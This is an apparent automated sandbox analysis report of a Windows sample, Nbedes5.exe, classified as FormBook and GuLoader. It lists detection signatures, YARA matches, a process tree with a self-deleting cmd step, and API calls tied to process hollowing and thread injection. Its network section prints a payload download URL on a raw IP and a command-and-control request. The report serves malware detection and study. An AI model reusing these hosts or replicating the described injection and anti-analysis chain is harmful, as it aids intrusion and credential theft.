
Analysis Report Nbedes5.exe

Overview

General Information

Sample Name: Nbedes5.exe
Analysis ID: 297930
MD5: 6386849f8a478fd08477053700ee3ea3
SHA1: 1c8da40fedbdf778bdce0b580ad2dfb34c829ec7
SHA256: 1c81f41c9117ff33b9ef73de5b6e429b571bae3393b8ce9bd4f3f28ba48b276b
Tags: exe


Detection

FormBook GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Potential malicious icon found
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious Svchost Process
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Nbedes5.exe (PID: 780 cmdline: 'C:\Users\user\Desktop\Nbedes5.exe' MD5: 6386849F8A478FD08477053700EE3EA3)
    • Nbedes5.exe (PID: 5492 cmdline: 'C:\Users\user\Desktop\Nbedes5.exe' MD5: 6386849F8A478FD08477053700EE3EA3)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • svchost.exe (PID: 6872 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
          • cmd.exe (PID: 6952 cmdline: /c del 'C:\Users\user\Desktop\Nbedes5.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source: 00000002.00000002.336717561.000000001DFE0000.00000040.00000001.sdmp, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 00000002.00000002.336717561.000000001DFE0000.00000040.00000001.sdmp, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000002.00000002.336717561.000000001DFE0000.00000040.00000001.sdmp, Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
  • 0x18419:$sqlite3step: 68 34 1C 7B E1
  • 0x1852c:$sqlite3step: 68 34 1C 7B E1
  • 0x18448:$sqlite3text: 68 38 2A 90 C5
  • 0x1856d:$sqlite3text: 68 38 2A 90 C5
  • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
Source: 0000000E.00000002.506793601.000000000372F000.00000004.00000001.sdmp, Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Author: Florian Roth
  • 0x8624:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Source: 00000002.00000002.330459852.0000000000060000.00000040.00000001.sdmp, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security

Sigma Overview

System Summary:

Sigma detected: Suspicious Svchost Process
Source: Process started, Author: Florian Roth, Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3388, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 6872
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process started, Author: vburov, Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3388, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 6872

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: Nbedes5.exe, Virustotal: Detection: 11%
Yara detected FormBook
Source: Yara match, File source: 00000002.00000002.336717561.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.330459852.0000000000060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000E.00000002.502533038.0000000002C60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000E.00000002.498831427.0000000000180000.00000004.00000001.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4x nop then pop esi, 14_2_02C772F7

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.3:49725 -> 192.210.146.118:80
Source: Traffic, Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.64:80 -> 192.168.2.3:49752
Source: global traffic, HTTP traffic detected:
  GET /u2e/?Qzu=LliTtBVPwZEXL&NXI=CLTwbbAHWNHwUgTBGGOjQw89hdV93bv1HgRwxFb1Iv9NJP0kWDsmPbTpQEmmznWuHko/ HTTP/1.1
  Host: www.pinacle.online
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: Joe Sandbox View, ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View, ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
Source: global traffic, HTTP traffic detected:
  GET /bin_SQZyzLkAMl175.bin HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
  Host: 192.210.146.118
  Cache-Control: no-cache
Source: C:\Users\user\Desktop\Nbedes5.exe, Code function: 2_2_0056505B InternetReadFile
Source: unknown, DNS traffic detected: queries for: www.pinacle.online
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Wed, 14 Oct 2020 13:37:17 GMT
  Server: Apache/2.4.29 (Ubuntu)
  Content-Length: 327
  Connection: close
  Content-Type: text/html; charset=utf-8
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 32 65 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /u2e/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: Nbedes5.exe, 00000002.00000002.331449051.0000000000560000.00000040.00000001.sdmp, String found in binary or memory: http://192.210.146.118/bin_SQZyzLkAMl175.bin
Source: explorer.exe, 00000005.00000000.312839969.0000000008907000.00000004.00000001.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.zhongyicts.com.cn
Source: Nbedes5.exe, 00000000.00000002.252094938.000000000070A000.00000004.00000020.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match, File source: 00000002.00000002.336717561.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.330459852.0000000000060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000E.00000002.502533038.0000000002C60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000E.00000002.498831427.0000000000180000.00000004.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 00000002.00000002.336717561.000000001DFE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000002.00000002.336717561.000000001DFE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000E.00000002.506793601.000000000372F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 00000002.00000002.330459852.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000002.00000002.330459852.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000E.00000002.502533038.0000000002C60000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000E.00000002.502533038.0000000002C60000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000E.00000002.498831427.0000000000180000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000E.00000002.498831427.0000000000180000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Potential malicious icon foundShow sources
      Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F4A5D NtProtectVirtualMemory,0_2_021F4A5D
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F02A9 EnumWindows,NtSetInformationThread,TerminateProcess,LoadLibraryA,0_2_021F02A9
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F0427 NtSetInformationThread,TerminateProcess,0_2_021F0427
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F505B NtMapViewOfSection,0_2_021F505B
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F207F NtWriteVirtualMemory,0_2_021F207F
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F5077 NtMapViewOfSection,0_2_021F5077
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F3E60 NtSetInformationThread,TerminateProcess,0_2_021F3E60
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F4107 NtSetInformationThread,TerminateProcess,0_2_021F4107
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F4F03 NtMapViewOfSection,0_2_021F4F03
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F4F3F NtMapViewOfSection,0_2_021F4F3F
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F1F5F NtWriteVirtualMemory,0_2_021F1F5F
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F1F57 NtWriteVirtualMemory,0_2_021F1F57
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F4F4F NtMapViewOfSection,0_2_021F4F4F
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F4F47 NtMapViewOfSection,0_2_021F4F47
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F1F7F NtWriteVirtualMemory,0_2_021F1F7F
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F1F77 NtWriteVirtualMemory,0_2_021F1F77
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F1F6F NtWriteVirtualMemory,0_2_021F1F6F
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F1F67 NtWriteVirtualMemory,0_2_021F1F67
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F1F87 NtWriteVirtualMemory,0_2_021F1F87
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279A20 NtResumeThread,LdrInitializeThunk,2_2_1E279A20
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_1E279A00
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_1E279660
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279A50 NtCreateFile,LdrInitializeThunk,2_2_1E279A50
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2796E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_1E2796E0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279710 NtQueryInformationToken,LdrInitializeThunk,2_2_1E279710
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2797A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_1E2797A0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279780 NtMapViewOfSection,LdrInitializeThunk,2_2_1E279780
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279860 NtQuerySystemInformation,LdrInitializeThunk,2_2_1E279860
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279840 NtDelayExecution,LdrInitializeThunk,2_2_1E279840
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2798F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_1E2798F0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_1E279910
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279540 NtReadFile,LdrInitializeThunk,2_2_1E279540
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2799A0 NtCreateSection,LdrInitializeThunk,2_2_1E2799A0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2795D0 NtClose,LdrInitializeThunk,2_2_1E2795D0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279610 NtEnumerateValueKey,2_2_1E279610
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279A10 NtQuerySection,2_2_1E279A10
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279670 NtQueryInformationProcess,2_2_1E279670
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279650 NtQueryValueKey,2_2_1E279650
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279A80 NtOpenDirectoryObject,2_2_1E279A80
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2796D0 NtCreateKey,2_2_1E2796D0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279730 NtQueryVirtualMemory,2_2_1E279730
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279B00 NtSetValueKey,2_2_1E279B00
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E27A710 NtOpenProcessToken,2_2_1E27A710
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279760 NtOpenProcess,2_2_1E279760
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279770 NtSetInformationFile,2_2_1E279770
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E27A770 NtOpenThread,2_2_1E27A770
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E27A3B0 NtGetContextThread,2_2_1E27A3B0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279FE0 NtCreateMutant,2_2_1E279FE0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279820 NtEnumerateKey,2_2_1E279820
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E27B040 NtSuspendThread,2_2_1E27B040
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2798A0 NtWriteVirtualMemory,2_2_1E2798A0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279520 NtWaitForSingleObject,2_2_1E279520
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E27AD30 NtSetContextThread,2_2_1E27AD30
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279560 NtWriteFile,2_2_1E279560
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279950 NtQueueApcThread,2_2_1E279950
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2795F0 NtQueryInformationFile,2_2_1E2795F0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2799D0 NtCreateProcessEx,2_2_1E2799D0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_00564A5D NtProtectVirtualMemory,2_2_00564A5D
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_00560878 NtProtectVirtualMemory,2_2_00560878
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_00560427 NtSetInformationThread,2_2_00560427
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_00564107 NtSetInformationThread,2_2_00564107
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_00563E60 NtSetInformationThread,2_2_00563E60
      Source: C:\Windows\explorer.exeCode function: 5_2_0614BA52 NtCreateFile,5_2_0614BA52
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269710 NtQueryInformationToken,LdrInitializeThunk,14_2_03269710
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269780 NtMapViewOfSection,LdrInitializeThunk,14_2_03269780
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269FE0 NtCreateMutant,LdrInitializeThunk,14_2_03269FE0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269660 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_03269660
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269650 NtQueryValueKey,LdrInitializeThunk,14_2_03269650
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269A50 NtCreateFile,LdrInitializeThunk,14_2_03269A50
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_032696E0 NtFreeVirtualMemory,LdrInitializeThunk,14_2_032696E0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_032696D0 NtCreateKey,LdrInitializeThunk,14_2_032696D0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269910 NtAdjustPrivilegesToken,LdrInitializeThunk,14_2_03269910
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269540 NtReadFile,LdrInitializeThunk,14_2_03269540
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_032699A0 NtCreateSection,LdrInitializeThunk,14_2_032699A0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_032695D0 NtClose,LdrInitializeThunk,14_2_032695D0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269860 NtQuerySystemInformation,LdrInitializeThunk,14_2_03269860
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269840 NtDelayExecution,LdrInitializeThunk,14_2_03269840
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269730 NtQueryVirtualMemory,14_2_03269730
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269B00 NtSetValueKey,14_2_03269B00
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0326A710 NtOpenProcessToken,14_2_0326A710
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269760 NtOpenProcess,14_2_03269760
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269770 NtSetInformationFile,14_2_03269770
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0326A770 NtOpenThread,14_2_0326A770
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_032697A0 NtUnmapViewOfSection,14_2_032697A0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0326A3B0 NtGetContextThread,14_2_0326A3B0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269A20 NtResumeThread,14_2_03269A20
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269A00 NtProtectVirtualMemory,14_2_03269A00
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269610 NtEnumerateValueKey,14_2_03269610
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269A10 NtQuerySection,14_2_03269A10
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269670 NtQueryInformationProcess,14_2_03269670
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269A80 NtOpenDirectoryObject,14_2_03269A80
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269520 NtWaitForSingleObject,14_2_03269520
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0326AD30 NtSetContextThread,14_2_0326AD30
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269560 NtWriteFile,14_2_03269560
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269950 NtQueueApcThread,14_2_03269950
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_032695F0 NtQueryInformationFile,14_2_032695F0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_032699D0 NtCreateProcessEx,14_2_032699D0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269820 NtEnumerateKey,14_2_03269820
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0326B040 NtSuspendThread,14_2_0326B040
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_032698A0 NtWriteVirtualMemory,14_2_032698A0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_032698F0 NtReadVirtualMemory,14_2_032698F0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C7A060 NtClose,14_2_02C7A060
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C7A110 NtAllocateVirtualMemory,14_2_02C7A110
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C79FE0 NtReadFile,14_2_02C79FE0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C79F30 NtCreateFile,14_2_02C79F30
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C7A05B NtClose,14_2_02C7A05B
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C7A10B NtAllocateVirtualMemory,14_2_02C7A10B
